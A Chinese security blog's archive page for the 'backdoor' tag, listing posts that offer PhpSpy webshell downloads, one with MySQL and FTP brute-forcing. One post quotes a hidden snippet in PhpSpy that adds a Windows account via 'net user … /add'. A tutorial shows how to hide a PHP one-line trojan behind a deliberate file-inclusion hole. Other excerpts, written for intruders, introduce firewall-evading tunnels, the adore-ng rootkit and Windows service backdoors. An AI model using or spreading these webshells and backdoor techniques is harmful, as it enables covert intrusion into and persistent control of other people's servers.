注册 | 登录 | 归档 | 搜索 | 标签 | 评论 | 链接 | 滚动板 | 在线工具
浏览模式: 标准 | 列表 Tag: 后门

PhpSpy2008低调上市

Posted by amxku on 2008-01-07, 8:51 PM

angel说做人要低调点的。

更多请关注本www.4ngel.net

附件: phpspy_2008.rar [ 18.89 K, 下载次数:311 ]

Tags: phpspy, 后门, 工具

共享 | 评论: 6 | 阅读: 2330

PhpSpy2008

Posted by amxku on 2007-12-21, 7:11 PM

先看下angel忽悠我的部分源码  makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');
makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
</script> 太牛X了,还好我先看了下代码,呼呼。估计是跟黑锅学的,这Y的不学好。前几天测试的那个版本还有部分问题,这个版本,基本上是已经很完美了,在MYSQL管理方面是大大的强。

AJAX也比较强,今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的,在AJAX面前就什么都不是了。

Tags: phpspy, 后门

其它 | 评论: 6 | 阅读: 2122

浅析Windows2000/XP服务与后门技术

Posted by amxku on 2007-12-15, 1:54 PM

一> 序言
    windows下的服务程序都遵循服务控制管理器(SCM)的接口标准,它们会在登录系统时自动运行,甚至在没有用户登录系统的情况下也会正常执行,类似与UNIX系统中的守护进程(daemon)。它们大多是控制台程序,不过也有少数的GUI程序。本文所涉及到的服务程序仅限于windows2000/XP系统中的一般服务程序,不包含windows9X。本文相关服务后门程序和代码可以到我们的主页FZ5FZ下载。

二> windows服务简介
    服务控制管理器拥有一个在注册表中记录的数据库,包含了所有已安装的服务程序和设备驱动服务程序的相关信息。它允许系统管理员为每个服务自定义安全要求和控制访问权限。windows服务包括四大部分:服务控制管理器(Service Control Manager),服务控制程序(Service Control Program),服务程序(Service Program)和服务配置程序(Service Configuration Program)。

» 阅读全文

Tags: 系统安全, 系统, 后门, 服务, windows

技术 | 评论: 1 | 阅读: 1654

phpSPY 2006 最终修改版

Posted by amxku on 2007-03-29, 10:32 AM


7J 刚发过来的

加了目录加包,MYSQL和FTP的暴力破解,MYSQL上传下载,ADODB等,更多的东东大家自己去体会吧!

附件: shell.php [ 91.27 K, 下载次数:513 ]

Tags: 工具, phpspy, 后门

共享 | 评论: 1 | 阅读: 3639

PHP后门隐藏

Posted by amxku on 2006-09-04, 1:00 AM

首先建立一php文件test.php 文件内容为:
  $test=$_GET['test'];
  @include 'test/'.$test;
  ?>   
  Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问http://localhost/test/test.php?test=../t.txt如果你看到t.txt的内容就证明Ok了, 然后把在lanker微型php后门客户端 木马地址添入http://localhost/test/test.php?test=../t.txt密码里添入cmd就可以了,执行返回的结果都可以看到。   

» 阅读全文

Tags: 代码收藏, php, 后门

技术 | 评论: 0 | 阅读: 2532

Linux下的后门和日志工具

Posted by amxku on 2006-06-13, 7:16 PM

 攻入linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具

  1、从这里延伸:后门和连接工具

  (1)Httptunnel

  Tunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是 在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。说得简单点,就是说在防火墙两边都设立一个转换程序,将原来需要发送或接受的数据包封装成 HTTP请求的格式骗过防火墙,所以它不需要别的代理服务器而直接穿透防火墙。

» 阅读全文

Tags: 安全, linux, 后门, 工具

技术 | 评论: 0 | 阅读: 2597

linux后门系列之adore-ng

Posted by amxku on 2006-03-31, 8:14 PM

前言:
kernel 2.6已经大步走入linux的世界,写后门的和用后门的也得跟上潮流。

简写约定:
fc:fedora core
rh:red hat
rhel4:red hat enterprise linux 4
sk:suckit
adore:adore-ng
rk:rootkit
lkm:loadable kernel modules

什么是adore-ng?

» 阅读全文

Tags: linux, 后门

技术 | 评论: 1 | 阅读: 3150